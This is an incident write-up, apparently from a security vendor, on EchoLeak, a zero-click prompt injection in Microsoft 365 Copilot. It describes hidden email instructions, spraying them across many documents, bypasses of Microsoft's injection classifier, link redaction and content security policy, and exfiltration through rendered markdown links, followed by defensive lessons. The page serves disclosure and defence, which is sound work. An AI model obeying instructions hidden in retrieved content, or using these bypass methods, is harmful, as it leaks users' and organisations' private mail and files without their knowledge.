EchoLeak CVE-2025-32711 — Zero-Click Prompt Injection in M365 Copilot Silently Exfiltrates Email, Teams, and SharePoint Data Without User Interaction

EchoLeak (CVE-2025-32711) is a zero-click indirect prompt injection in Microsoft 365 Copilot that silently exfiltrates email, Teams, OneDrive, and SharePoint data. Patched May 2026.

Microsoft 365 CopilotTool execution / MCPZero-click indirect prompt injection enabling AI context data exfiltrationMicrosoft 365 Copilot RAG context window (Outlook, Teams, OneDrive, SharePoint, Office files)

What happened

Attacker sends a specially crafted email with hidden prompt payload; Copilot's RAG engine retrieves it during a subsequent user query and executes the payload, exfiltrating emails, Teams messages, OneDrive files, and SharePoint documents to attacker-controlled endpoints via rendered markdown links and images.

Why it matters

Demonstrated silent exfiltration of any data accessible to Copilot's context window: email content, Teams conversations, OneDrive files, SharePoint documents, and Office file contents—with no user awareness or interaction. Potentially affects all M365 enterprise tenants with Copilot enabled.

Missing authorization check

Retrieved document content and executable instructions were not sandboxed from one another. Copilot had no mechanism to distinguish legitimate user queries from injected instructions in retrieved email content. An authority gate requiring explicit user authorization for outbound data transmission to external URLs was absent.

Would PP block it?

The exfiltration path in EchoLeak operates through Copilot's response channel—markdown image and link rendering with sensitive data appended as query parameters—rather than through explicit tool calls or agent action APIs. PP's enforcement layer sits at the tool-call boundary and would not intercept exfiltration embedded in AI response text. This class of vulnerability requires response-layer sandboxing and content security controls, not action-level authorization receipts.

Incident analysis

Timeline and technical read

Timeline

2025-06-12
CVE-2025-32711 first publicly documented; EchoLeak named as the first zero-click indirect prompt injection demonstrated in a production M365 Copilot deployment.
2025-08-27
Checkmarx publishes detailed technical breakdown of the zero-click attack chain, including XPIA classifier bypass, link/image redaction bypass, and CSP bypass techniques.
2025-09-06
Academic paper published on arXiv documenting EchoLeak as the first known production LLM system with confirmed zero-click prompt injection data exfiltration capability.
2026-05-01
Microsoft releases server-side patch addressing the EchoLeak vulnerability; no in-the-wild exploitation confirmed prior to patch.
2026-06-16
EchoLeak resurfaces in enterprise security roundups alongside SearchLeak (CVE-2026-42824), a related one-click M365 Copilot exfiltration variant discovered by Varonis.

Technical breakdown

Indirect prompt injection via hidden email content (HTML comments or white-on-white text) invisible to users but parsed and retained by Copilot's LLM engine as instruction-level context.
RAG spraying: attacker injects malicious prompts into multiple emails or documents to increase the probability that one is retrieved during any Copilot query from the victim.
Three-layer bypass chain: XPIA classifier bypass (evading Microsoft's cross-prompt injection detection), link/image redaction bypass (reference-style markdown circumventing standard redaction), and CSP bypass (using allowed domains such as SharePoint and Teams).
Zero user interaction required: exfiltration triggers on any subsequent Copilot query where the RAG engine retrieves the poisoned email—the victim never clicks, opens, or acts on the malicious message.
Patched server-side by Microsoft in May 2026, but the underlying RAG context injection class of risk persists for any LLM system that does not separate retrieved content from the instruction channel.

Authorization boundary

Where the authorization boundary should have been

This incident is categorized as Tool execution / MCP. The relevant Permission Protocol gate is Tool-Call Gate. The read is conditional: the block only applies where the real action boundary is routed through a gate.

If enforced at: RAG context boundary / response rendering layer (outside PP scope)
Still needs: Response-channel data exfiltration via LLM output text; PP does not govern AI response content or outbound URL rendering in LLM-generated markdown
Receipt required for: N/A — the exfiltration path bypasses the tool-call layer where PP enforces; would require response-layer sandboxing controls

EchoLeak exploits the AI response rendering channel for exfiltration, not authorized tool calls. PP enforces action-layer authorization for agent tool calls; it does not govern what an LLM includes in its response text or which markdown URLs it renders.

Lessons for teams

RAG-based AI assistants inherit the trust level of their context window; retrieved content must never be treated as executable at the instruction level—strict data/instruction separation is required.
Zero-click exfiltration from enterprise AI is achievable with only email send access to the target organization; no internal access or credentials are required.
Content Security Policy alone is insufficient to prevent AI response-channel exfiltration when the AI model renders markdown with external URLs.
AI systems with broad data access (email, files, messages) must treat all retrieved content as untrusted data—not as potentially executable instructions from an authorized principal.
The EchoLeak-to-SearchLeak progression shows prompt injection attack techniques iterate rapidly; patching one variant does not eliminate the underlying class of risk.

Related incidents and controls

High2026-06-15

CVE-2026-42824 SearchLeak: One Malicious Link Made M365 Copilot Exfiltrate Email, MFA Codes, and Calendar Data

High2025-10-08

CamoLeak: GitHub Copilot Flaw Allowed Silent Data Theft

High2025-05-26

Invariant Labs: Malicious GitHub Issue Hijacked AI Assistant to Exfiltrate Private Repo Data via MCP Prompt Injection

Tool-Call Gate Audit Receipt

Start small

Put the relevant gate at this action boundary.

This incident maps to Tool-Call Gate. Start with the boundary that controls the actual action, then require a signed receipt before execution.

Replay this incident with a signer in the loop